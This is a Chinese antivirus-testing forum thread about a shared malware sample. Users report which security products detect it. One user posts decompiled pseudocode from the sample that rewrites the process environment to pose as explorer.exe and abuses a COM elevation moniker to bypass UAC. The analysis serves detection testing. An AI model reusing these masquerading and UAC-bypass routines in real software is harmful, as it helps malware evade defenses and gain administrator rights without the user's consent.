样本

显示全部楼层 · 发表于 2024-9-22 13:09:01

Loyisa 发表于 2024-9-22 12:38
Comodo 扫描miss 同没跑出恶意行为

楼上测卡巴的几位好像跑出来了？

显示全部楼层 · 发表于 2024-9-22 13:19:11

wwwab 发表于 2024-9-22 13:09
楼上测卡巴的几位好像跑出来了？

对，但是我这里没跑出来外联啥的

显示全部楼层 · 发表于 2024-9-22 13:33:02

显示全部楼层 · 发表于 2024-9-22 13:33:37

本帖最后由 DisaPDB 于 2024-9-22 14:57 编辑

int sub_10001210()
{
{
lpBaseAddress = 0;
memset(v28, 0, 0x38u);
v20 = 0;
v21 = 0;
LibraryA = LoadLibraryA("ntdll.dll");
NtQueryInformationProcess = (NTSTATUS (__stdcall *)(HANDLE, PROCESSINFOCLASS, PVOID, ULONG, PULONG))GetProcAddress(LibraryA, "NtQueryInformationProcess");
if ( NtQueryInformationProcess && NtQueryInformationProcess(v1, ProcessBasicInformation, &v5, 24, 0) >= 0 )
{
ReadProcessMemory(v1, lpBaseAddress, &Buffer, 0x20u, 0);
ReadProcessMemory(v1, *(LPCVOID *)((char *)&v15 + 3), &v22, 0x48u, 0);
v20 = 48;
WriteProcessMemory(v1, v28[13], L"C:\\windows\\explorer.exe", 0x30u, 0);
WriteProcessMemory(v1, &v28[12], &v20, 2u, 0);
v21 = 48;
WriteProcessMemory(v1, v28[11], L"C:\\windows\\explorer.exe", 0x30u, 0);
WriteProcessMemory(v1, &v28[10], &v21, 2u, 0);
CloseHandle(v1);
return 1;
}
else
{
return 0;
}
}
return result;
}

复制代码

从ntdll中取出NtQueryInformationProcess并调用，向explorer.exe写入内存

int __thiscall sub_10001060(void *this)
{
memset(&pclsid, 0, sizeof(pclsid));
memset(&iid, 0, sizeof(iid));
ppv = 0;
CLSIDFromString(L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}", &pclsid);
IIDFromString(L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}", &iid);
memset(sz, 0, sizeof(sz));
memset(pszName, 0, 520);
CoInitialize(0);
StringFromGUID2(&pclsid, sz, 260);
if ( sub_10001000(L"Elevation:Administrator!new:%s", sz) < 0 )
goto LABEL_4;
memset(&pBindOptions.grfFlags, 0, 12);
v7 = 0;
v9 = 0;
v10 = 0;
pBindOptions.cbStruct = 36;
v11 = 0;
v8 = 4;
if ( CoGetObject(pszName, &pBindOptions, &iid, &ppv) < 0
|| (v2 = (*(int (__stdcall **)(void *, void *, const wchar_t *, _DWORD, _DWORD, _DWORD))(*(_DWORD *)ppv + 36))(
ppv,
this,
L"-register abc",
0,
0,
0),
v3 = 1,
v2 < 0) )
{
LABEL_4:
v3 = 0;
}
if ( ppv )
(*(void (__stdcall **)(void *))(*(_DWORD *)ppv + 8))(ppv);
return v3;
}

复制代码

白利用RuntimeSvc.exe ，这个COM接口估计就是瑞星报UACBypass的原因

显示全部楼层 · 发表于 2024-9-22 14:21:36

（EIS+智量）实机双击svcghost.exe，miss，进程没退等了几分钟手动关闭，是在检测什么呢

显示全部楼层 · 发表于 2024-9-22 19:19:41

ELGD报安全，好像只要ELGD报安全之后eset就完全不管了。。。

显示全部楼层 · 发表于 2024-9-22 19:45:08

火绒

QQUpdateMgr\FLVLib.dll, 病毒名：Trojan/Generic!B8E9CE5760F44D56, 病毒ID：b8e9ce5760f44d56, 处理结果：已处理，删除文件

显示全部楼层 · 发表于 2024-9-22 22:27:51

腾讯电脑管家 1X

显示全部楼层 · 发表于 2024-9-22 23:33:52

显示全部楼层 · 发表于 2024-9-23 08:09:36

kaba666 发表于 2024-9-22 10:56
整个过程在不停的调用Consoie Windows Host, 貌似在检测电脑是否安装有QQ等或其它，再次测，这玩意还有点顽 ...

你测试比较认真哈，让我认识到真实的卡巴，卡巴就是这样强大是很强大，但总不那么尽如人意

[病毒样本] 样本